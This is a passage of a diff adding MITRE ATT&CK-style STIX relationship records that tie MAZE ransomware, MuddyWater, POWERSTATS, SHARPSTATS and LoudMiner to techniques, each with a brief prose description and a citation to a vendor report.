+ "description": "Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "The [MAZE](https://attack.mitre.org/software/S0449) encryption process has used batch scripts with various commands.(Citation: FireEye Maze May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--a747c7d5-afe9-4120-bb18-f21b5d9bb988",
+ "type": "relationship",
+ "modified": "2020-06-24T01:39:05.802Z",
+ "created": "2020-05-18T17:31:39.469Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+ "external_references": [
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has attempted to delete the shadow volumes of infected machines, once before and once after the encryption process.(Citation: McAfee Maze March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--ea32ebd2-9827-43ec-a3d3-f0148fee8ed8",
+ "type": "relationship",
+ "modified": "2020-06-24T01:40:07.449Z",
+ "created": "2020-05-18T17:31:39.474Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has used several Windows API functions throughout the encryption process including IsDebuggerPresent, TerminateProcess, Process32FirstW, among others.(Citation: McAfee Maze March 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--6e4d32b9-923f-46a9-887e-4d4d0687fd1b",
+ "type": "relationship",
+ "modified": "2020-06-24T01:40:07.451Z",
+ "created": "2020-05-18T17:31:39.475Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055",
+ "external_references": [
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has used \"wmic.exe\" attempting to delete the shadow volumes on the machine.(Citation: McAfee Maze March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--b8ead9c4-0403-4b23-b33f-8ac1c57f8e82",
+ "type": "relationship",
+ "modified": "2020-06-24T01:40:07.456Z",
+ "created": "2020-05-18T17:31:39.477Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has decrypted strings and other important information during the encryption process. [MAZE](https://attack.mitre.org/software/S0449) also calls certain functions dynamically to hinder analysis.(Citation: McAfee Maze March 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--e3864ffa-3348-4791-b979-7d8b2e2151cc",
+ "type": "relationship",
+ "modified": "2020-06-24T01:40:07.454Z",
+ "created": "2020-05-18T17:31:39.482Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has checked the language of the infected system using the \"GetUSerDefaultUILanguage\" function.(Citation: McAfee Maze March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--0d3f773c-ed0e-4db4-8457-204a7a33eb58",
+ "type": "relationship",
+ "modified": "2020-06-24T01:40:07.453Z",
+ "created": "2020-05-18T17:31:39.484Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5",
+ "external_references": [
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has inserted large blocks of junk code, including some components to decrypt strings and other important information for later in the encryption process.(Citation: McAfee Maze March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--0bbdc984-1515-4a8e-a211-2817371fc75e",
+ "type": "relationship",
+ "modified": "2020-06-24T01:40:07.458Z",
+ "created": "2020-05-18T17:31:39.486Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has gathered all of the running system processes.(Citation: McAfee Maze March 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--c54e60c1-728d-4211-b309-89f928ae7f0a",
+ "type": "relationship",
+ "modified": "2020-06-24T01:40:07.572Z",
+ "created": "2020-05-18T17:31:39.490Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+ "external_references": [
+ {
+ "source_name": "FireEye Maze May 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
+ "description": "Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has disrupted systems by encrypting files on targeted machines, claiming to decrypt files if a ransom payment is made. [MAZE](https://attack.mitre.org/software/S0449) has used the ChaCha algorithm, based on Salsa20, and an RSA algorithm to encrypt files.(Citation: FireEye Maze May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--006e029e-0714-4f99-befd-53b9fbc7c8c8",
+ "type": "relationship",
+ "modified": "2020-06-24T01:39:05.871Z",
+ "created": "2020-05-18T17:31:39.583Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
+ "target_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c",
+ "external_references": [
+ {
+ "source_name": "ClearSky MuddyWater June 2019",
+ "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf",
+ "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has base64 encoded C2 communications.(Citation: ClearSky MuddyWater June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--a1fc4800-c670-4bc1-bc42-2b5fe66d0297",
+ "type": "relationship",
+ "modified": "2020-05-20T20:52:34.253Z",
+ "created": "2020-05-18T17:43:36.737Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
+ "target_ref": "attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21",
+ "external_references": [
+ {
+ "source_name": "Reaqta MuddyWater November 2017",
+ "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
+ "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used a Word Template, Normal.dotm, for persistence.(Citation: Reaqta MuddyWater November 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--07af222c-dbd5-4ea4-b94b-a0fe8bdefcee",
+ "type": "relationship",
+ "modified": "2020-05-18T19:04:37.688Z",
+ "created": "2020-05-18T19:04:37.688Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "Reaqta MuddyWater November 2017",
+ "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
+ "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used scheduled tasks to establish persistence.(Citation: Reaqta MuddyWater November 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--c8f3916d-e020-42a8-afe0-25fe8498245a",
+ "type": "relationship",
+ "modified": "2020-05-18T19:04:37.692Z",
+ "created": "2020-05-18T19:04:37.692Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "Reaqta MuddyWater November 2017",
+ "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
+ "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used C2 infrastructure to receive exfiltrated data.(Citation: Reaqta MuddyWater November 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--dfb4c7e9-e1af-4716-b658-9cfbadd706dc",
+ "type": "relationship",
+ "modified": "2020-05-20T20:52:34.280Z",
+ "created": "2020-05-18T19:04:37.694Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
+ "target_ref": "tool--c8655260-9f4b-44e3-85e1-6538a5f6e4f4",
+ "external_references": [
+ {
+ "source_name": "Reaqta MuddyWater November 2017",
+ "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
+ "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020."
+ },
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "(Citation: Reaqta MuddyWater November 2017)(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--fd119308-f4b9-4d06-adf2-08a76baee7d9",
+ "type": "relationship",
+ "modified": "2020-05-18T19:46:02.257Z",
+ "created": "2020-05-18T19:04:38.065Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--e8545794-b98c-492b-a5b3-4b5a02682e37",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) has used get_tasklist to discover processes on the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--ff3b4b17-7d3f-43a9-8e9a-ce56909da725",
+ "type": "relationship",
+ "modified": "2020-05-18T19:37:52.273Z",
+ "created": "2020-05-18T19:37:52.273Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--e8545794-b98c-492b-a5b3-4b5a02682e37",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) has the ability to identify the username on the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1567eaca-2b2e-44df-b447-87769738e00a",
+ "type": "relationship",
+ "modified": "2020-05-18T19:37:52.331Z",
+ "created": "2020-05-18T19:37:52.331Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--e8545794-b98c-492b-a5b3-4b5a02682e37",
+ "target_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5",
+ "external_references": [
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) has used useless code blocks to counter analysis.(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--ee47ad7d-0c85-46fb-a4f7-047fdff09a03",
+ "type": "relationship",
+ "modified": "2020-05-18T19:37:52.336Z",
+ "created": "2020-05-18T19:37:52.336Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
+ "target_ref": "tool--3433a9e8-1c47-4320-b9bf-ed449061d1c3",
+ "external_references": [
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--baec4c99-f8f9-4789-a73d-c6b652299048",
+ "type": "relationship",
+ "modified": "2020-05-18T19:46:02.154Z",
+ "created": "2020-05-18T19:46:02.154Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
+ "target_ref": "tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d",
+ "external_references": [
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--649748ff-e2d0-4369-8f5d-3c8b5b5010ed",
+ "type": "relationship",
+ "modified": "2020-05-18T19:46:02.176Z",
+ "created": "2020-05-18T19:46:02.176Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--73c4711b-407a-449d-b269-e3b1531fe7a9",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to identify the domain of the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7c606ccd-2a38-4498-8807-47f00685c203",
+ "type": "relationship",
+ "modified": "2020-05-18T20:04:59.415Z",
+ "created": "2020-05-18T20:04:59.415Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--73c4711b-407a-449d-b269-e3b1531fe7a9",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to identify the username on the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f52cb753-6f2f-4f23-834a-75510e8fb47a",
+ "type": "relationship",
+ "modified": "2020-05-18T20:04:59.435Z",
+ "created": "2020-05-18T20:04:59.435Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--73c4711b-407a-449d-b269-e3b1531fe7a9",
+ "target_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077",
+ "external_references": [
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to identify the current date and time on the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--e0b5c501-c949-4b60-8e2e-37a584dba8fe",
+ "type": "relationship",
+ "modified": "2020-05-18T20:04:59.438Z",
+ "created": "2020-05-18T20:04:59.438Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--73c4711b-407a-449d-b269-e3b1531fe7a9",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to identify the IP address, machine name, and OS of the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--de70abfa-848f-4993-bdb8-7235d4a3d720",
+ "type": "relationship",
+ "modified": "2020-05-18T20:04:59.441Z",
+ "created": "2020-05-18T20:04:59.441Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--73c4711b-407a-449d-b269-e3b1531fe7a9",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to employ a custom PowerShell script.(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8e324a04-e543-4eed-bf21-cdf446d8f8f6",
+ "type": "relationship",
+ "modified": "2020-05-18T20:04:59.455Z",
+ "created": "2020-05-18T20:04:59.455Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--73c4711b-407a-449d-b269-e3b1531fe7a9",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to upload and download files.(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8f0afd2b-8cb3-4b5b-b19f-39887602fe95",
+ "type": "relationship",
+ "modified": "2020-05-18T20:04:59.458Z",
+ "created": "2020-05-18T20:04:59.458Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) used a script to gather the IP address of the infected machine before sending to the C2.(Citation: ESET LoudMiner June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--89bd934f-2d0b-487e-9235-138403b91267",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.278Z",
+ "created": "2020-05-18T21:01:51.142Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) used SCP to update the miner from the C2.(Citation: ESET LoudMiner June 2019)",
